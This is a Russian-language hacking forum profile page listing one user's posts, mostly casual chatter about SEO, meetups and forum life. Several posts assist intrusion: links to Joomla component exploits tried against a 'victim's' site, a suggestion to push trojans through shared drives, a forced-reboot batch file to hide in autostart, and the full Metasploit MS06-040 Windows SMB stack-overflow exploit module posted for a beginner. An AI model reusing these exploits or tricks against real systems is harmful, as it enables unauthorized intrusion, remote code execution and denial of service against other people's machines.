Мои сообщения - GivioN — HackZona.Ru

GivioN — Сообщения

GivioN
0

Мои сообщения на форумах

Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Проблема со взломом Joomla
Эксплоиты в компонентах я тоже могу найти, только от этого толку 0, жертва имеет только стандартные компоненты на который дырок мало, но типа есть;

Вот сплоиты для стандартных компонентов
1) [url]http://sebug.net/exploit/17893/[/url] com_mailto — есть в версии 1.5.15 — ПРОВЕРИЛ НЕ РАБОТАЕТ

2) [url]http://securityreason.com/expldownload/1/8066/1[/url] com_weblinks — есть почти во всех версиях но к сожалению проверил на трех — ПРОВЕРИЛ НЕ РАБОТАЕТ; только вот почему не пашет судя из [url]http://www.joomlaexploit.com/[/url] очень новая дырка.

3) [url]http://securityreason.com/expldownload/1/7633/1[/url] com_wrapper — есть во всех версиях, ПРОВЕРИЛ БЕЗ ИЗмЕНЕНИЙ

4) [url]http://securityreason.com/expldownload/1/8065/1[/url] com_xmap — Это дополнительный компонент, дыра там найдена совсем не давно, но все же тоже ничего не работает.

В Чем это все проявляется что найденые свежие баги не работают?
Сервис обманывает? или руки кривые?
На счет рук моих, решил проверить те переменные в которых бага, но слабаватые знания пхп не дали мне это сделать. Может кто посмотрит реально там баги или сервис стебается?
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Вот в этом то и проблема, что публику набрать тяжело, я больше по сео специализируюсь, поднимаю тиц вывожу в топ. Но все же спасибо за отзывы, Буду искать способы дальнейшего развития.
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Взлом браузерной игры
А авторизации разве нету?
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Наши Встречи в теме Поинт???
А мне можно?
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=fraIzer;87444]А хочешь сниму?) идея кстати)[/QUOTE]

ну раз написал значит хочу
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=Kerny;87254]ХОЧУ УВИДЕТЬ ВО ОЧИЮ, ПЕРЕХВАТ TCP/IP СЕССИИ[/QUOTE]

во загнул! Такого я еще ни разу не слышал.
вот я бы хотел увидить скуль инъекцию методом пост, но не ту что через багу авторизации пользователей.
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Наш Портал в теме Приём в Help Team
А меня можно? :)
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=fraIzer;86823]А я смотрю ты вообще не в теме :) [/QUOTE]

а это вобще не тема, а сплошной флейм
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE='Soviet[HZ];85182']))) Отлично![/QUOTE]

ты кто такой будешь? Или воскрес?
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Вот и я вернулсо)))
Привлек новый форум на булке, диз отлично подобрали. Еще бы не мешало пару модулей добавть, например для добавления репы))
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Самое главное в раскрутке это сделать его интересным, тогда люди потянуться к тебе…
А если быть более точным, то сделай так что бы ПС съели его страницы, и оптимизируй его так что бы запросам в ПС вылетал на первые страницы, главным притоком трафа я является яндекс а это как говорили SEO. Можешь подпись добавить как я это делаю, только это больших плюсов не принесет)))
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Взлом Telnet
[quote:c58b025855=«MACKLIA»][quote:c58b025855=«ExZoD»][b:c58b025855]Westcoaster[/b:c58b025855], убейся. Все ответы даны.[/quote:c58b025855]

Почти согласен, только вопрос, а нафига на самом деле килять Support 'a ?[/quote:c58b025855]

Вот вот, и я о том же :lol: :lol: :lol:
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[quote:e168115e45=«ivan961»]А вот ещё один вопросик: как сделать так что бы перегрузка проискодила к примеру только после скажем 22:00 или после часа работы.[/quote:e168115e45]

Я с этим не разбирался, поэтому копай самостоятельно тут forum.ru-board.com/topic.cgi?forum=5&topic;=25393
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Взлом Telnet
Да да… Фильтрует.
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Плохо начинаешь…
… Иди читай статьи Сенсея на главной ХакЗоны, и не флуди на форуме
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Разное в теме Сколько вам лет?
[b:83151e3eb5]21[/b:83151e3eb5], а москов как у канарейки спермы :lol:
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Разное в теме filin
Лучше поздно, чем никогда.

ПОЗДРАВЛЯЮ!!!
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Разное в теме Успевамость.... признавайтесь!
Не учусь, но на пары хожу)))
[quote:4789e411c9=«DrWeb»] Счас рвусь в армию подалее от всего этого мозго? бства)[/quote:4789e411c9]
а я наоборот, но подальше всего того мозго? бства)
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
набери:
[code:1:a9d9e5e27f]ftp> help[/code:1:a9d9e5e27f]- появится помощь
Напримет:
[code:1:a9d9e5e27f]get file.exe[/code:1:a9d9e5e27f] — отправит твой файл
А лучше не парься, расшарь диски и визуально впаривай трояны)))
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
как я понел ты кодить не умеешь…
[code:1:600771736d]
@echo off title System file
shutdown -r -t 1 -c -f
[/code:1:600771736d]
сохраняешь как *.bat и что бы не вылетало ненужное нам окно вот прога [url=http://ifolder.ru/7197807]скачать[/url]

закидываешь полученный файл в автозагрузку
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Хакинг низкого уровня
Какой уровень актуален это зависит от уровня твоих знаний. Низкий уровень хакинга более профессиональный чем высокий. В отличии от высокого, низкий дает больше возможностей, привилегий(рут) после успешной атаки. Да, в наше время для большей массы людей которые занимаются хакингом, наиболее актуальным является именно хакинг высокого уровня, везде, на форумах в чатах в повседневной жизни можно заметить что именно этот уровень обсуждается наиболее часто. Ведь для того чтоб задефейсить сайт не обязательно открывать что то новое, достаточно правильно ввести запрос уязвимого файла или скрипта в гугл, или же сходить в багтрак и найти нужную тебе уязвимость форумного движка или CMS. Если же говорить об атаки на низком уровне то тут такой халявы нет. Ты скажешь: а как же готовые сплойты для «взятия» сервера?
Ответ: большинство готовых сплойтов ушли в прошлое, сетевое программое обеспечение намного быстрее обновляется, чем выходит в павлик под его сплойт. Поэтому актуально было бы писать самому сплойты под сетевые сервисы, но таких людей только единицы, т.к. нужны огромные знания в работе ПО, взаимодействие ПО и операционой системы, доскональное знание работы многих сетевых протоколов, а так же глубокие знание ассемблера и си. Поэтому тебе самому решать что для тебя актуально. Как говорится: каждый выбирает по себе…
Для тех кто хочет подробно понять что такое хакинг низкого уровня, почитайте статьи drWeb'а на главной ХЗ.

P.S: К хакингу низкого уровня я не учитовал такой способ атаки как Dos и DDos
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Взлом и Хакер в теме Дамп ОЗУ
Точно в такие подробности не вникал, но где то слышал что можно. Только ты получишь машинный код низкого уровня… А это Ассемблер
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Взлом и Хакер в теме Kaspersky Lab "XSS"
Жду первого дефейса:)
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме нужен совет
[code:1:59c08f3170]
package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflow',
'Version' => '$Revision: 3715 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],

'Arch' => ['x86'],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
},

'Payload' =>
{
# Technically we can use more space than this, but this lets us
# keep the same payload size between XP and 2000 and still allow
# for multiple exploit runs against a single instance
'Space' => 420,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Keys' => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(
qq{
This module exploits a stack overflow in the NetApi32 NetpIsRemote() function
using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
other RPC calls could be used to exploit this service. This exploit will result in
a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
will likely result in a complete reboot on Windows 2000 and the termination of all
SMB-related services on Windows XP.
}
),

'Refs' =>
[
[ 'BID', '18325' ],
[ 'CVE', '2006-2370' ],
[ 'MSB', 'MS06-025' ],
[ 'OSVDB', '26437' ],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic for Windows 2000 and Windows XP SP0/SP1' ],
[ 'Windows 2000', 1025, 1005, 1017, 0x00020804, 0x00020830, 32 ],
[ 'Windows XP', 631, 611, 623, 0x00020804, 0x000209c0, 140 ]
],

'Keys' => ['srvsvc'],

'DisclosureDate' => 'Aug 08 2006',
};

sub new {
my ($class) = @_;
my $self =
$class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target_name = '*SMBSERVER';

my $FragSize = $self->GetVar('FragSize') || 256;
my $target = $self->Targets->[$target_idx];

if (!$self->InitNops(128)) {
$self->PrintLine("Could not initialize the nop module");
return;
}

my ( $res, $rpc );

my $pipe = '\BROWSER';
my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
my $version = '3.0';

my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

my $dce = Pex::DCERPC->new(
'handle' => $handle,
'username' => $self->GetVar('SMBUSER'),
'password' => $self->GetVar('SMBPASS'),
'domain' => $self->GetVar('SMBDOM'),
'fragsize' => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb' => $self->GetVar('DirectSMB'),
);

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};
if (! $smb) {
$self->PrintLine("[*] Could not establish SMB session");
return;
}

if ( $target->[0] =~ /Automatic/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target');
}
elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
$target = $self->Targets->[2];
$self->PrintLine('[*] Detected a Windows XP target');
$self->PrintLine('[*] This will not work on SP2!');
}
elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows NT 4.0 target');
$self->PrintLine('[*] Please email us with the results!');
}
else {
$self->PrintLine('[*] No target available for '. $smb->PeerNativeOS() );
return;
}
}
#
# /* Function 0x1f at 0x767e912c */
# long function_1f (
# [in] [unique] [string] wchar_t * arg_00,
# [in] [string] wchar_t * arg_01,
# [out] [size_is(arg_03)] char * arg_02,
# [in] [range(0, 64000)] long arg_03,
# [in] [string] wchar_t * arg_04,
# [in,out] long * arg_05,
# [in] long arg_06
# );
#

# Prepend nops based on the target
$shellcode = $self->MakeNops($target->[6]). $shellcode;
my $boom = Pex::Text::AlphaNumText($target->[1]);
# Stuff our payload in first
substr($boom, 0, length($shellcode), $shellcode);

# Return address offset and value
substr($boom, $target->[2], 4, pack('V', $target->[5]));
# Destination pointer offset and value
substr($boom, $target->[3], 4, pack('V', $target->[4]));

# Stick it into a path
my $path = "\x5c". $boom. "\x00\x00";
# Package that into a stub
my $stub =
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::Long(0);

$self->PrintLine("[*] Sending request...");
# Function 0x1f is not the only way to exploit this :-)
my @response = $dce->request( $handle, 0x1f, $stub );
if ( length($dce->{'response'}->{'StubData'}) > 0) {
$self->PrintLine("[*] The server rejected it, trying again...");
@response = $dce->request( $handle, 0x1f, $stub );
}
if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] '. $line );
}
}

return;
}

1;
# milw0rm.com [2006-08-10]
[/code:1:59c08f3170]

удаленное выполнение кода возможно только на Windows 2000 и XP SP 1, так что тебе это наверно не поможет((
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сообщение с форума: Помощь Новичкам в теме Взломать архив
[quote:e155d772f0=«BoBo007»]взламывал от 8 до 15 символов[/quote:e155d772f0]
в двоичной системе счисления?

З.Ы: Точно археологи:))
2 3